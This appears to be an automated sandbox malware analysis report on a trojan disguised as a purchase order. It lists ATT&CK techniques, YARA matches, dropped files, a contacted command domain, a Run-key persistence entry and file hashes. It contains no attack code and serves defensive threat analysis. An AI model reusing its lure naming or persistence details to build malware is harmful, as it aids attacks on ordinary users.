                      Source: Yara match, File source: 00000020.00000002.487748726.000000000645C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: Process Memory Space: 08042021New-PurchaseOrder.exe PID: 4952, type: MEMORY
                      Source: Yara match, File source: Process Memory Space: SWqTT.exe PID: 3064, type: MEMORY
                      Source: Yara match, File source: 32.2.SWqTT.exe.64915d0.5.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 1.2.08042021New-PurchaseOrder.exe.3543aa8.3.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 32.2.SWqTT.exe.64915d0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 1.2.08042021New-PurchaseOrder.exe.3543aa8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 1.2.08042021New-PurchaseOrder.exe.35790c8.4.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 1.2.08042021New-PurchaseOrder.exe.35790c8.4.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
                      |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                      | Valid Accounts | Windows Management Instrumentation 211 | Application Shimming 1 | Exploitation for Privilege Escalation 1 | Disable or Modify Tools 11 | OS Credential Dumping | File and Directory Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
                      | Default Accounts | Native API 1 | Windows Service 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | System Information Discovery 114 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Encrypted Channel 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
                      | Domain Accounts | Command and Scripting Interpreter 1 | Registry Run Keys / Startup Folder 1 | Access Token Manipulation 1 | Obfuscated Files or Information 2 | Security Account Manager | Query Registry 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
                      | Local Accounts | Service Execution 2 | Logon Script (Mac) | Windows Service 1 | Timestomp 1 | NTDS | Security Software Discovery 331 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud |
                      | Cloud Accounts | Cron | Network Logon Script | Process Injection 11 | Masquerading 1 | LSA Secrets | Virtualization/Sandbox Evasion 251 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
                      | Replication Through Removable Media | Launchd | Rc.common | Registry Run Keys / Startup Folder 1 | Virtualization/Sandbox Evasion 251 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
                      | External Remote Services | Scheduled Task | Startup Items | Startup Items | Access Token Manipulation 1 | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
                      | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 11 | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
                      | Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Hidden Files and Directories 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |

                      Behavior Graph

                      [Figure: behavior graph. Behavior Graph ID: 383917; Sample: 08042021New-PurchaseOrder.bat; Startdate: 08/04/2021; Architecture: WINDOWS; Score: 96]

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      | Source | Detection | Scanner | Label | Link |
                      |---|---|---|---|---|
                      | 08042021New-PurchaseOrder.exe | 15% | ReversingLabs | ByteCode-MSIL.Packed.Generic | |

                      Dropped Files

                      | Source | Detection | Scanner | Label | Link |
                      |---|---|---|---|---|
                      | C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe | 3% | Metadefender | | Browse |
                      | C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe | 0% | ReversingLabs | | |
                      | C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe | 3% | Metadefender | | Browse |
                      | C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe | 0% | ReversingLabs | | |
                      | C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe | 3% | Metadefender | | Browse |
                      | C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe | 0% | ReversingLabs | | |
                      | C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe | 15% | ReversingLabs | ByteCode-MSIL.Packed.Generic | |

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      Source | Detection | Scanner | Label | Link
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-12737166900%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-12737166900%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-12737166900%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-199458160%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-199458160%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-199458160%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      myliverpoolnews.cf | 172.67.150.212 | true | false | | unknown

                        Contacted URLs

                        Name | Malicious | Antivirus Detection | Reputation
                        http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E349A863A698863617D7B55886FAE832.html | false | Avira URL Cloud: safe | unknown
                        http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5183A347C7BAD04E3424599E1B978F29.html | false | Avira URL Cloud: safe | unknown

                        URLs from Memory and Binaries

                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpg08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-0208042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-1994608042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-199383608042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpg08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://schema.org/ListItem08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            high
                                            https://www.liverpool.com/all-about/georginio-wijnaldum08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://myliverpoolnews.cf408042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://mab.data.tm-awx.com/rhs&quot;08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://www.liverpool.com/all-about/andrew-robertson08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://sectigo.com/CPS0C08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://sectigo.com/CPS0D08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-19953308042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-19959008042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://www.liverpool.com/08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://myliverpoolnews.cf08042021New-PurchaseOrder.exe, 00000001.00000002.289004611.0000000002471000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.liverpool.com/all-about/transfers08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://reach-id.orbit.tm-awx.com/analytics.js.gz08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-1716486808042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-117808042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown

                                            Contacted IPs


                                            Public

                                            IP:172.67.150.212
                                            Domain:myliverpoolnews.cf
                                            Country:United States
                                            ASN:13335
                                            ASN Name:CLOUDFLARENETUS
                                            Malicious:false

                                            Private

                                            IP
                                            192.168.2.1

                                            General Information

                                            Joe Sandbox Version:31.0.0 Emerald
                                            Analysis ID:383917
                                            Start date:08.04.2021
                                            Start time:12:23:00
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 13m 1s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:08042021New-PurchaseOrder.bat (renamed file extension from bat to exe)
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:40
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal96.troj.evad.winEXE@35/25@2/2
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 23.5% (good quality ratio 21.5%)
                                            • Quality average: 78%
                                            • Quality standard deviation: 31.2%
                                            HCA Information:
                                            • Successful, ratio: 83%
                                            • Number of executed functions: 154
                                            • Number of non-executed functions: 170
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            Warnings:
                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 23.54.113.53, 168.61.161.212, 52.147.198.201, 67.26.83.254, 8.241.82.126, 8.238.36.254, 8.241.78.126, 8.253.207.121, 104.43.193.48, 40.88.32.150, 52.255.188.83, 95.100.54.203, 20.82.209.183, 23.0.174.200, 23.0.174.185, 23.10.249.43, 23.10.249.26, 20.54.26.129, 20.50.102.62
                                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/383917/sample/08042021New-PurchaseOrder.exe

                                            Simulations

                                            Behavior and APIs

                                            Time      Type             Description
                                            12:24:32  API Interceptor  1x Sleep call for process: WerFault.exe modified
                                            12:24:36  API Interceptor  535x Sleep call for process: 08042021New-PurchaseOrder.exe modified
                                            12:24:48  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SWqTT C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                            12:24:52  API Interceptor  51x Sleep call for process: powershell.exe modified
                                            12:24:57  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SWqTT C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe

                                            Joe Sandbox View / Context

                                            IPs


                                            Domains


                                            ASN

                                            Match: CLOUDFLARENETUS
                                            Associated Sample Name / URL | Detection | Context
                                            ETL_126_072_60.doc | malicious | 172.67.150.212
                                            IMG_102-05_78_6.doc | malicious | 172.67.150.212
                                            MT103_YIU LIAN08042021_Xerox Scan_202104_.exe | malicious | 172.67.188.154
                                            PO4308.exe | malicious | 104.21.49.158
                                            pumYguna1i.exe | malicious | 23.227.38.74
                                            gqnTRCdv5u.exe | malicious | 104.21.65.7
                                            Calt7BoW2a.exe | malicious | 104.21.48.10
                                            0BAdCQQVtP.exe | malicious | 23.227.38.74
                                            lfQuSBwdSf.exe | malicious | 172.67.188.154
                                            TazxfJHRhq.exe | malicious | 23.227.38.74
                                            AQJEKNHnWK.exe | malicious | 23.227.38.74
                                            hvEop8Y70Y.exe | malicious | 172.67.219.254
                                            RFQ-034.exe | malicious | 104.21.56.119
                                            ACdEbpiSYO.exe | malicious | 172.67.150.212
                                            PURCHASE ORDER - XIFFA55,pdf.exe | malicious | 172.67.188.154
                                            Invoice_ord00000009.exe | malicious | 172.67.150.212
                                            PRICE_QUOTATION_RFQ_000988_PDF.exe | malicious | 172.67.188.154
                                            kayo.exe | malicious | 172.67.150.212
                                            nicoleta.fagaras-DHL_TRACKING_1394942.html | malicious | 104.16.18.94
                                            000OUTQ080519103.pdf.exe | malicious | 172.67.164.131

                                            JA3 Fingerprints

                                            Match: 54328bd36c14bd82ddaa0c04b25ed9ad
                                            Associated Sample Name / URL | Detection | Context
                                            MT103_YIU LIAN08042021_Xerox Scan_202104_.exe | malicious | 172.67.150.212
                                            lfQuSBwdSf.exe | malicious | 172.67.150.212
                                            RFQ-034.exe | malicious | 172.67.150.212
                                            ACdEbpiSYO.exe | malicious | 172.67.150.212
                                            PURCHASE ORDER - XIFFA55,pdf.exe | malicious | 172.67.150.212
                                            Invoice_ord00000009.exe | malicious | 172.67.150.212
                                            kayo.exe | malicious | 172.67.150.212
                                            RFQ 100400806 SUPPLY.exe | malicious | 172.67.150.212
                                            new_order20210408_14.doc | malicious | 172.67.150.212
                                            BL01345678053567.exe | malicious | 172.67.150.212
                                            SER09090899.exe | malicious | 172.67.150.212
                                            PURCHASE ORDER-34002174,pdf.exe | malicious | 172.67.150.212
                                            cricket.exe | malicious | 172.67.150.212
                                            DHLdocument11022020680908911.exe | malicious | 172.67.150.212
                                            20200804-8293847pdf.scr.exe | malicious | 172.67.150.212
                                            234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exe | malicious | 172.67.150.212
                                            SKMC25832100083932157.jar | malicious | 172.67.150.212
                                            SecuriteInfo.com.Artemis34DBCAD2CB5A.27289.exe | malicious | 172.67.150.212
                                            EMPRESA SUMPEX TRADE.exe | malicious | 172.67.150.212
                                            Yeni siparis _WJO-001, pdf.exe | malicious | 172.67.150.212

                                            Dropped Files

                                            Match: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe
                                            Associated Sample Name / URL | Detection
                                            RFQ-034.exe | malicious
                                            Payment Slip.exe | malicious
                                            Revised Invoice No CU 7035.exe | malicious
                                            Sales_Order description.exe | malicious
                                            Outstanding invoices.exe | malicious
                                            Q88_Bulk Carrier.exe | malicious
                                            Payment _Slip copy.exe | malicious
                                            MV. HUA KAI V-2023.exe | malicious
                                            Order_April shipment.exe | malicious
                                            INVOICE for Order PIEX310113978.exe | malicious
                                            Krishna Gangaa Enviro System Pvt Ltd.exe | malicious
                                            TT SWIFT COPY.exe | malicious
                                            PO75773937475895377.exe | malicious
                                            SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exe | malicious
                                            Download Report.06.05.2021.exe | malicious
                                            Outstanding invoices.exe | malicious
                                            IMG_767893434432.exe | malicious
                                            VMtEguRH.exe | malicious
                                            SHIPPING DOCS - MV. SN QUEEN.exe | malicious
                                            MT CAPE AZALEA V219 PENAVICO 13-10-20.exe | malicious

                                                                                    Created / dropped Files

                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_08042021New-Purc_27713ebec8c220f2d5c09c5ea843cd62601d18_a44221a1_197a503e\Report.wer
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):17810
                                                                                    Entropy (8bit):3.76111653919658
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:JVWG2858mHBUZMXSaKQqueZiAr/u7sHS274ItrID:a859BUZMXSaFmD/u7sHX4ItrID
                                                                                    MD5:AF4E1C227B0751BF1A53848C9F03A9E6
                                                                                    SHA1:DC534378D22964114EEAAFAF7A386E17ED6956A2
                                                                                    SHA-256:A8579E2D19A25EA28420219C22800E67AC709339BBFAD9B4452F071C8D6245FB
                                                                                    SHA-512:E6E0347F43F7E4212DA8047A0691AC3517FBE69831A76EB2812401BBB134C3BA563BD0665C384378B36AC6EDF86C7151C05CEBD40BAE5E67A1F48CD32C196AB4
                                                                                    Malicious:false
                                                                                     Preview: Version=1..EventType=CLR20r3..EventTime=132623834666506814..ReportType=2..Consent=1..UploadTime=132623834708381688..ReportStatus=268566528..ReportIdentifier=a20a58b3-29a2-4f9b-8938-158b847815fc..IntegratorReportIdentifier=b1a92e4f-e709-4795-ad98-d79837b9f193..Wow64Host=34404..Wow64Guest=332..NsAppName=08042021New-PurchaseOrder.exe..OriginalFilename=Dimbono.exe..AppSessionGuid=00001358-0001-0017-7b97-10b3ac2cd701..TargetAppId=W:000644905294daf239dd6142d109e1cd01fb00000000!00000ef424d2000f18e6b83
                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER3A64.tmp.dmp
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Thu Apr 8 19:24:28 2021, 0x1205a4 type
                                                                                    Category:dropped
                                                                                    Size (bytes):216131
                                                                                    Entropy (8bit):4.277177437167617
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:K9gIOgF5D0IUCgU/OMonDD0Jjd+pLnLqmIQ8AC:K9RpDDLTj1+n0+pbQ
                                                                                    MD5:76DAA92CA9E2F639D4A568D2A4D70E64
                                                                                    SHA1:94D20601C7B055218717B090681CF098B84CB54B
                                                                                    SHA-256:2D78C048DC77E027A8F20DBCA16AA6D7EFAB2839F61CE8184A7B57DFFBCF8926
                                                                                    SHA-512:8C6F28A50D4E07A10B0D0739D82CEA7DD0D6A51A715D2593BD0856980A9C41E71DD889225AD17238CAF35766EB62B8516298ACFE40781B802A1F1A7800E636A3
                                                                                    Malicious:false
                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER48CD.tmp.WERInternalMetadata.xml
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):8464
                                                                                    Entropy (8bit):3.691990666806616
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:Rrl7r3GLNi1wx6a4N6YSCSUB6r9BagmfZGSJCpr589bqnosf0lTum:RrlsNi1O636YXSUB6qgmfESHqnbfg
                                                                                    MD5:2EE7D828681FD55EEB4F8891CD796B2A
                                                                                    SHA1:EFD9CE3F378CDC328073951F1ECB3991E236BBE2
                                                                                    SHA-256:CE5351E5E76808C0B7092BDAEB352E9580361AD4105E0FBD159CF88356D2B910
                                                                                    SHA-512:D8ABBCFEDE9CC145CA3F79ED1D873BF39720D004D9CCBFE7AE062E7E9B67DF0F7F924929AE96E3BF6F2A3DB6798131BC1059520700A63592FB0403D079EDBC12
                                                                                    Malicious:false
                                                                                     Preview: <?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>17134</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>.. <Revision>1</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>1033</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>4952</Pid>..
                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A06.tmp.xml
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):4825
                                                                                    Entropy (8bit):4.497489010071743
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:cvIwSD8zsuJgtWI9e4WSC8BY8fm8M4JyFFJT+q8vjTnEM6b3/5dd:uITfk1xSNHJEKfnEM6D5dd
                                                                                    MD5:2AB29E9A09B790218331EC3C4CEE857A
                                                                                    SHA1:9CAA69CF504EBEE2B77AA77B68EAA3C6E6104103
                                                                                    SHA-256:6CCEC29B8813A4EE4751818F0C609B4B964995A8C96F7D908D2A5DFAC9E15E06
                                                                                    SHA-512:7C2067CCE77DE292366EBD378F09C46769A5BFF6211177D6FE3403FCB899DA1CBD03216EBF04AADAD73108951FBEAE097C8B850576D68ACD13279F01BF5EBD85
                                                                                    Malicious:false
